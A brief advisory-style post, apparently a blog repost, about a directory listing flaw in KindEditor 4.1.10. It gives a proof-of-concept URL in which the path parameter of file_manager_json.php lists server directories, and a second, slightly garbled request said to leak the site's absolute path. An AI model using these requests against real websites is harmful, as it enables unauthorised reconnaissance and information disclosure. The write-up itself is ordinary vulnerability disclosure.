Kindeditor 4.1.10 directory listing vulnerability

Kindeditor directory listing vulnerability

Test environment: KindEditor 4.1.10

PoC:http://localhost/kindeditor/php/file_manager_json.php?path=/var/www/html/

Given the information leak site absolute path: http: //localhost/kindeditor/php/file_manager_json.php path = /?

 

Guess you like

Origin www.cnblogs.com/dgjnszf/p/12110919.html